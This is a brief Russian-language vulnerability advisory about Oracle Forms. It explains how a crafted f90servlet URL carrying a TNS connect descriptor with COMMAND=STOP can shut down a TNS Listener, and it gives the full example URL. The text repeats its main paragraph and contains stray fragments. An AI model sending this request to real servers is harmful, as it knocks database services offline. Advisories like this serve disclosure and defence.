Повышение привилегий в Oracle Forms
Уязвимость позволяет удаленному пользователю остановить процесс TNS Listener.
Если TNS Listener защищен паролем, удаленный пользователь может с помощью специально сформированного URL остановить работу процесса. Пример:
:zns2: Производтель
Уязвимость позволяет удаленному пользователю остановить процесс TNS Listener.
Если TNS Listener защищен паролем, удаленный пользователь может с помощью специально сформированного URL остановить работу процесса. Пример:
Код:
http://[target]:8888/forms90/f90servlet?form=
test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=
(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)
(HO ST=server)(PORT=1521)))(CONNECT_DATA=
(COMMAND=STOP)(SERVICE=LISTENER)))&
buffer_records=NO&debug_messages=NO&array=YES
& query_only=NO&quiet=NO&RENDER=YES:zns2: Производтель